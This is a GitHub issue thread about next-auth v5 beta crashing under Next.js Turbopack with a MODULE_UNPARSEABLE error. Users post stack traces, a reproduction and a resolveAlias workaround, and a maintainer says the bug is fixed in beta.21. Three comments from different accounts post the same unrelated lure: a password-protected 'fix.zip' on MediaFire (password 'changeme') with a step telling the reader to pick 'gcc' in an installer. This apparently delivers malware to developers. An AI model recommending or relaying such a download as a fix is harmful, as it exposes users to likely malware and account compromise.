### ISSUE TITLE
Next-Auth crashes in a turborepo

### ISSUE THREAD

**Issue by dhruvkaushik305** [nextauthjs/next-auth#11674]
### Environment

```
  System:
    OS: Linux 6.8 Ubuntu 22.04.4 LTS 22.04.4 LTS (Jammy Jellyfish)
    CPU: (8) x64 Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz
    Memory: 2.26 GB / 7.42 GB
    Container: Yes
    Shell: 5.1.16 - /bin/bash
  Binaries:
    Node: 20.15.1 - ~/.nvm/versions/node/v20.15.1/bin/node
    Yarn: 1.22.22 - ~/.nvm/versions/node/v20.15.1/bin/yarn
    npm: 10.7.0 - ~/.nvm/versions/node/v20.15.1/bin/npm
    pnpm: 9.6.0 - ~/.local/share/pnpm/pnpm
  Browsers:
    Chrome: 128.0.6613.84
```

### Reproduction URL

https://github.com/dhruvkaushik305/test-turbo/tree/main/apps/web

### Describe the issue

In the default turborepo, when the signIn button is clicked, it should render the sigin page. However it instead raises an error that
```javascript
web:dev:  ⨯ Error: Could not parse module '[project]/node_modules/.pnpm/next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/server/future/route-modules/app-route/vendored/contexts/app-router-context.js'
web:dev:     at Object.<anonymous> (/home/dhruv/test/apps/web/.next/server/chunks/33e10_next_2f38d9._.js:7686:11)
web:dev:     at [project]/node_modules/.pnpm/next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/server/future/route-modules/app-route/vendored/contexts/app-router-context.js [app-route] (ecmascript) (/home/dhruv/test/apps/web/.next/server/chunks/33e10_next_2f38d9._.js:7689:3)
web:dev:     at instantiateModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:520:23)
web:dev:     at getOrInstantiateModuleFromParent (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:572:12)
web:dev:     at commonJsRequire (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:136:20)
web:dev:     at Object.<anonymous> (/home/dhruv/test/apps/web/.next/server/chunks/33e10_next_2f38d9._.js:8155:40)
web:dev:     at [project]/node_modules/.pnpm/next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/client/components/navigation.js [app-route] (ecmascript) (/home/dhruv/test/apps/web/.next/server/chunks/33e10_next_2f38d9._.js:8356:3)
web:dev:     at instantiateModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:520:23)
web:dev:     at getOrInstantiateModuleFromParent (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:572:12)
web:dev:     at commonJsRequire (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:136:20)
web:dev:     at Object.<anonymous> (/home/dhruv/test/apps/web/.next/server/chunks/33e10_next_2f38d9._.js:8359:18)
web:dev:     at [project]/node_modules/.pnpm/next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/navigation.js [app-route] (ecmascript) (/home/dhruv/test/apps/web/.next/server/chunks/33e10_next_2f38d9._.js:8361:3)
web:dev:     at instantiateModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:520:23)
web:dev:     at getOrInstantiateModuleFromParent (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:572:12)
web:dev:     at esmImport (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:122:20)
web:dev:     at /home/dhruv/test/apps/web/.next/server/chunks/08b5e__pnpm_763698._.js:3258:267
web:dev:     at [project]/node_modules/.pnpm/next-auth@5.0.0-beta.20_next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1__react@18.3.1/node_modules/next-auth/lib/actions.js [app-route] (ecmascript) (/home/dhruv/test/apps/web/.next/server/chunks/08b5e__pnpm_763698._.js:3365:3)
web:dev:     at instantiateModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:520:23)
web:dev:     at getOrInstantiateModuleFromParent (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:572:12)
web:dev:     at esmImport (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:122:20)
web:dev:     at /home/dhruv/test/apps/web/.next/server/chunks/08b5e__pnpm_763698._.js:3509:347
web:dev:     at [project]/node_modules/.pnpm/next-auth@5.0.0-beta.20_next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1__react@18.3.1/node_modules/next-auth/index.js [app-route] (ecmascript) <module evaluation> (/home/dhruv/test/apps/web/.next/server/chunks/08b5e__pnpm_763698._.js:3514:3)
web:dev:     at instantiateModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:520:23)
web:dev:     at getOrInstantiateModuleFromParent (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:572:12)
web:dev:     at esmImport (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:122:20)
web:dev:     at /home/dhruv/test/apps/web/.next/server/chunks/[project]_apps_web_9c619e._.js:12:366
web:dev:     at [project]/apps/web/auth.ts [app-route] (ecmascript) (/home/dhruv/test/apps/web/.next/server/chunks/[project]_apps_web_9c619e._.js:36:3)
web:dev:     at instantiateModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:520:23)
web:dev:     at getOrInstantiateModuleFromParent (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:572:12)
web:dev:     at esmImport (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:122:20)
web:dev:     at /home/dhruv/test/apps/web/.next/server/chunks/[project]_apps_web_9c619e._.js:44:125
web:dev:     at [project]/apps/web/app/api/[...nextauth]/route.ts [app-route] (ecmascript) (/home/dhruv/test/apps/web/.next/server/chunks/[project]_apps_web_9c619e._.js:49:3)
web:dev:     at instantiateModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:520:23)
web:dev:     at getOrInstantiateModuleFromParent (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:572:12)
web:dev:     at esmImport (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:122:20)
web:dev:     at /home/dhruv/test/apps/web/.next/server/chunks/33e10_next_2f38d9._.js:8376:162
web:dev:     at [project]/node_modules/.pnpm/next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/esm/build/templates/app-route.js { INNER_APP_ROUTE => "[project]/apps/web/app/api/[...nextauth]/route.ts [app-route] (ecmascript)" } [app-route] (ecmascript) (/home/dhruv/test/apps/web/.next/server/chunks/33e10_next_2f38d9._.js:8411:3)
web:dev:     at instantiateModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:520:23)
web:dev:     at instantiateRuntimeModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:580:12)
web:dev:     at Object.getOrInstantiateRuntimeModule (/home/dhruv/test/apps/web/.next/server/chunks/[turbopack]_runtime.js:595:12)
web:dev:     at Object.<anonymous> (/home/dhruv/test/apps/web/.next/server/app/api/[...nextauth]/route.js:8:26)
web:dev:     at Module._compile (node:internal/modules/cjs/loader:1358:14)
web:dev:     at Module._extensions..js (node:internal/modules/cjs/loader:1416:10)
web:dev:     at Module.load (node:internal/modules/cjs/loader:1208:32)
web:dev:     at Module._load (node:internal/modules/cjs/loader:1024:12)
web:dev:     at Module.require (node:internal/modules/cjs/loader:1233:19)
web:dev:     at mod.require (/home/dhruv/test/node_modules/.pnpm/next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/server/require-hook.js:65:28)
web:dev:     at require (node:internal/modules/helpers:179:18)
web:dev:     at requirePage (/home/dhruv/test/node_modules/.pnpm/next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/server/require.js:109:84)
web:dev:     at /home/dhruv/test/node_modules/.pnpm/next@14.2.6_react-dom@18.3.1_react@18.3.1__react@18.3.1/node_modules/next/dist/server/load-components.js:98:84 {
web:dev:   code: 'MODULE_UNPARSEABLE',
web:dev:   page: '/api/auth/signin'
web:dev: }
```
More than that even typescript complains about `signIn` and `auth` in the `auth.ts` file that 
```The inferred type of 'signIn' cannot be named without a reference to '.pnpm/@auth+core@0.34.2/node_modules/@auth/core/providers'. This is likely not portable. A type annotation is necessary.ts(2742)```

The same thing renders the signin page when written on a fresh next-app

### How to reproduce

Open the auth.ts file, there will be red squigglies on signIn and auth in VS code
Start the dev server, the web app in particular and hit the `signin` button

### Expected behavior

The auth.ts has no errors and the signIn button renders the signin page

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Pagebakers** [comment]
Running into a similar issue using turbopack, by the way your issue title should say turbopack not turborepo.

Reproduction:

```ts
// Add this in `app/api/[..nextauth]/route.ts
import NextAuth from 'next-auth'

const { handlers } = NextAuth({
  providers: [],
})

export const { GET, POST } = handlers
```

Run `next dev --turbo`

Open any /api/auth/* page and it will throw that error.

**Comment by brycefranzen** [comment]
I'm having this same issue with turbopack flag enabled on dev using Next.js V14.2.8. (`next dev --turbo`)

Error:
```bash
Error: Could not parse module '[project]/node_modules/next/dist/server/future/route-modules/app-route/vendored/contexts/app-router-context.js'
    at Object.<anonymous> (/home/bryce/www/oe5/.next/server/chunks/node_modules_next_c9e2a3._.js:7714:11)
    at [project]/node_modules/next/dist/server/future/route-modules/app-route/vendored/contexts/app-router-context.js [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/node_modules_next_c9e2a3._.js:7717:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at commonJsRequire (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:136:20)
    at Object.<anonymous> (/home/bryce/www/oe5/.next/server/chunks/node_modules_next_c9e2a3._.js:8183:40)
    at [project]/node_modules/next/dist/client/components/navigation.js [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/node_modules_next_c9e2a3._.js:8384:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at commonJsRequire (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:136:20)
    at Object.<anonymous> (/home/bryce/www/oe5/.next/server/chunks/node_modules_next_c9e2a3._.js:8387:18)
    at [project]/node_modules/next/navigation.js [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/node_modules_next_c9e2a3._.js:8389:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at esmImport (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:122:20)
    at /home/bryce/www/oe5/.next/server/chunks/node_modules_92e24c._.js:6614:140
    at [project]/node_modules/next-auth/lib/actions.js [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/node_modules_92e24c._.js:6721:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at esmImport (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:122:20)
    at /home/bryce/www/oe5/.next/server/chunks/node_modules_92e24c._.js:6865:152
    at [project]/node_modules/next-auth/index.js [app-route] (ecmascript) <module evaluation> (/home/bryce/www/oe5/.next/server/chunks/node_modules_92e24c._.js:6870:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at esmImport (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:122:20)
    at /home/bryce/www/oe5/.next/server/chunks/src_server_559e8e._.js:37:171
    at [project]/src/server/auth.ts [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/src_server_559e8e._.js:87:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at esmImport (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:122:20)
    at /home/bryce/www/oe5/.next/server/chunks/src_server_559e8e._.js:109:127
    at [project]/src/server/api/trpc.ts [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/src_server_559e8e._.js:162:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at esmImport (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:122:20)
    at /home/bryce/www/oe5/.next/server/chunks/src_server_559e8e._.js:169:134
    at [project]/src/server/api/routers/abtest.ts [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/src_server_559e8e._.js:192:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at esmImport (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:122:20)
    at /home/bryce/www/oe5/.next/server/chunks/src_server_559e8e._.js:2245:147
    at [project]/src/server/api/root.ts [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/src_server_559e8e._.js:2299:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at esmImport (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:122:20)
    at /home/bryce/www/oe5/.next/server/chunks/src_fac1b4._.js:97:134
    at [project]/src/app/api/trpc/[trpc]/route.ts [app-route] (ecmascript) (/home/bryce/www/oe5/.next/server/chunks/src_fac1b4._.js:123:3)
    at instantiateModule (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:520:23)
    at getOrInstantiateModuleFromParent (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:572:12)
    at esmImport (/home/bryce/www/oe5/.next/server/chunks/[turbopack]_runtime.js:122:20) {
  code: 'MODULE_UNPARSEABLE',
  page: '/api/trpc/domain.list'
}
```

If I remove the `--turbo` flag, all works as expected.  The `--turbo` flag worked without issues on V4.

**Comment by Pagebakers** [comment]
Still broken in 14.2.9 that was just released.

**Comment by Pagebakers** [comment]
Work around, add this to your next config

```
    turbo: {
      resolveAlias: {
        'next/server.js': 'next/server',
        'next/navigation.js': 'next/navigation',
        'next/headers.js': 'next/headers',
      },
    },
```

**Comment by pete-willard** [comment]
This is still an issue in `beta-21` / `next 14.2.13` and adding the above alias workaround doesn't help. Still getting the `Did you mean to import "next/server.js"?` error. Rolling back to `beta-20`

**Comment by balazsorban44** [comment]
Should be fixed in 5.0.0-beta.21, please give it a try! No workarounds or config hacks needed! 

@pete-willard please open a new bug report with a mininal reproduction. I saw your comment in the PR https://github.com/nextauthjs/next-auth/pull/11551 as well.

**Comment by wirob** [comment]
I'm getting the same TS error in version `5.0.0-beta.22`.

**Comment by pete-willard** [comment]
Just wanted to chime in `beta-24` did not change anything for me, I'm still getting the exact same error as shown above. The last version that worked for me with Turbopack enabled was `beta.20` and I just confirmed this. Each one after that instantly crashes my app. I tried the resolve workaround with no success.

I'm starting a new project at work and will not pursue this any further but I leave some additional context just in case it helps in any way:
- Next.js version is 14.2.15
- the app uses Page router but has started migration to the App router (the homepage was refactored but is hidden behind a middleware check)
- the configuration was refactored to the new v5 convention in `auth.ts` file
- the api handler route was refactored to `/app/api/auth/[...nextauth]/route.ts`
- the page router api route was deleted
